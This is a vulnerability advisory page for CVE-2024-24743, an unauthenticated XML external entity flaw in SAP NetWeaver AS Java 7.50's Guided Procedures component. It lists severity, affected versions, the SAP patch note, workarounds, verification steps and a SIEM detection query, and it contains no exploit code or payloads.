CVE-2024-24743 – CVE-2024-24743 is an XML external entity (XXE) ... (How to Fix)

Q: What is the severity of CVE-2024-24743?

CVE-2024-24743 has a CVSS score of 8.6 (HIGH). CVE-2024-24743 is an XML external entity (XXE) vulnerability in SAP NetWeaver AS Java's Guided Procedures component. Unauthenticated attackers can submit malicious XML files to access sensitive files and data without modification. This affects SAP NetWeaver AS Java version 7.50.

📋 TL;DR

CVE-2024-24743 is an XML external entity (XXE) vulnerability in SAP NetWeaver AS Java's Guided Procedures component. Unauthenticated attackers can submit malicious XML files to access sensitive files and data without modification. This affects SAP NetWeaver AS Java version 7.50.

💻 Affected Systems

Products:

SAP NetWeaver AS Java

Versions: 7.50

Operating Systems: All supported platforms

Default Config Vulnerable: ⚠️ Yes

Notes: Specifically affects the CAF - Guided Procedures component. Requires network access to the vulnerable endpoint.

📦 What is this software?

Netweaver Application Server Java by Sap

View all CVEs affecting Netweaver Application Server Java →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could read sensitive configuration files, user data, or system files, potentially leading to credential theft, data exfiltration, or reconnaissance for further attacks.

🟠

Likely Case

Unauthenticated attackers reading application configuration files, potentially exposing database credentials, API keys, or other sensitive information.

🟢

If Mitigated

With proper network segmentation and access controls, impact is limited to reading non-critical files within the application context.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

XXE vulnerabilities typically have low exploitation complexity. The description indicates unauthenticated network access is sufficient.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply SAP Security Note 3426111

Vendor Advisory: https://me.sap.com/notes/3426111

Restart Required: Yes

Instructions:

1. Download SAP Note 3426111 from SAP Support Portal. 2. Apply the patch to affected SAP NetWeaver AS Java systems. 3. Restart the SAP system to activate the fix.

🔧 Temporary Workarounds

Network Access Restriction

all

Restrict network access to SAP NetWeaver AS Java endpoints to trusted sources only

XML Parser Hardening

all

Configure XML parsers to disable external entity processing if possible

🧯 If You Can't Patch

Implement strict network segmentation to isolate SAP systems from untrusted networks
Deploy web application firewall (WAF) with XXE protection rules

🔍 How to Verify

Check if Vulnerable:

Check if SAP NetWeaver AS Java version 7.50 is running without SAP Note 3426111 applied

Check Version:

In SAP GUI: System → Status → Component version

Verify Fix Applied:

Verify SAP Note 3426111 is applied in transaction SNOTE and system is restarted

📡 Detection & Monitoring

Log Indicators:

Unusual XML file uploads to Guided Procedures endpoints
Multiple failed XML parsing attempts

Network Indicators:

HTTP requests with XML content to /CAF/GuidedProcedures endpoints
Unusual file read patterns from application server

SIEM Query:

source="sap_netweaver" AND (uri_path="/CAF/GuidedProcedures/*" AND content_type="application/xml")

📊 Metadata

CVE ID: CVE-2024-24743

CVSS v3 Score: 8.6 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CWE: CWE-611

Published: February 13, 2024

Last Updated: November 21, 2024

🔗 References

https://me.sap.com/notes/3426111 Permissions Required
https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Vendor Advisory
https://me.sap.com/notes/3426111 Permissions Required
https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-24743, you might also want to check these: